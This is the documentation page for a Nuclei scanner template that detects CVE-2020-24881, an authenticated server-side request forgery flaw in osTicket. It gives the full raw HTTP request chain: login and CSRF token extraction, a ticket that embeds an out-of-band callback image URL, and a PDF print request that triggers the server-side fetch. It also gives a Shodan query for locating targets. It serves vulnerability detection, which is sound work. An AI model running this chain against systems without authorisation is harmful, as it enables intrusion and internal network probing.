OsTicket < 1.14.3 - Server Side Request Forgery
ID: CVE-2020-24881
Severity: critical
Author: hnd3884
Tags: cve,cve2020,osticket,ssrf,authenticated
Description
Section titled “Description”SSRF vulnerability exists in osTicket before 1.14.3, allowing an attacker to add malicious files to the server or perform port scanning.
YAML Source
Section titled “YAML Source”id: CVE-2020-24881
info: name: OsTicket < 1.14.3 - Server Side Request Forgery author: hnd3884 severity: critical description: | SSRF vulnerability exists in osTicket before 1.14.3, allowing an attacker to add malicious files to the server or perform port scanning. reference: - https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0 - https://nvd.nist.gov/vuln/detail/CVE-2020-24881 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24881 cwe-id: CWE-918 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: osticket product: osticket shodan-query: title:"osticket" tags: cve,cve2020,osticket,ssrf,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http: - raw: - | GET /login.php HTTP/1.1 Host: {{Hostname}}
- | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrf_token}}&luser={{username}}&lpasswd={{password}}
extractors: - type: regex name: csrf_token part: body group: 1 regex: - '<meta name="csrf_token" content="(.+?)" \/>' internal: true
- raw: - | GET /open.php HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex name: option_value part: body group: 1 regex: - 'Select a Help Topic.+?[ \n]+<option value="(\d+)" >' internal: true
- type: regex name: csrf_token2 part: body group: 1 regex: - '<meta name="csrf_token" content="(.+?)" \/>' internal: true
- raw: - | GET /ajax.php/form/help-topic/{{option_value}} HTTP/1.1 Host: {{Hostname}} Referer: http://{{Hostname}}/open.php
- | POST /open.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------266856663522356381601517168829
-----------------------------266856663522356381601517168829 Content-Disposition: form-data; name="__CSRFToken__"
{{csrf_token2}} -----------------------------266856663522356381601517168829 Content-Disposition: form-data; name="a"
open -----------------------------266856663522356381601517168829 Content-Disposition: form-data; name="topicId"
{{option_value}} -----------------------------266856663522356381601517168829 Content-Disposition: form-data; name="{{formid}}"
1 -----------------------------266856663522356381601517168829 Content-Disposition: form-data; name="message"
<img src="https://11111.{{interactsh-url}}"> -----------------------------266856663522356381601517168829 Content-Disposition: form-data; name="draft_id"
-----------------------------266856663522356381601517168829--
matchers: - type: dsl dsl: - "status_code_2 == 302" internal: true
extractors: - type: regex name: formid part: body group: 1 regex: - '<label for=\\"([^"]+)\\">' internal: true
- type: regex name: ticketid part: header group: 1 regex: - 'Location: tickets\.php\?id=(\d+)' internal: true
- raw: - | GET /tickets.php?a=print&id={{ticketid}} HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(content_type, "application/pdf")' - "status_code == 200" condition: and# digest: 4a0a0047304502206651e1f023dfec4c8fda6ef45e23eddace1eeb1b88fc1ff245f1db872c8f26db022100a53894f66085593913aa1cc07e684711adac70053b19e638dabe851da4dc0175:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-24881.yaml"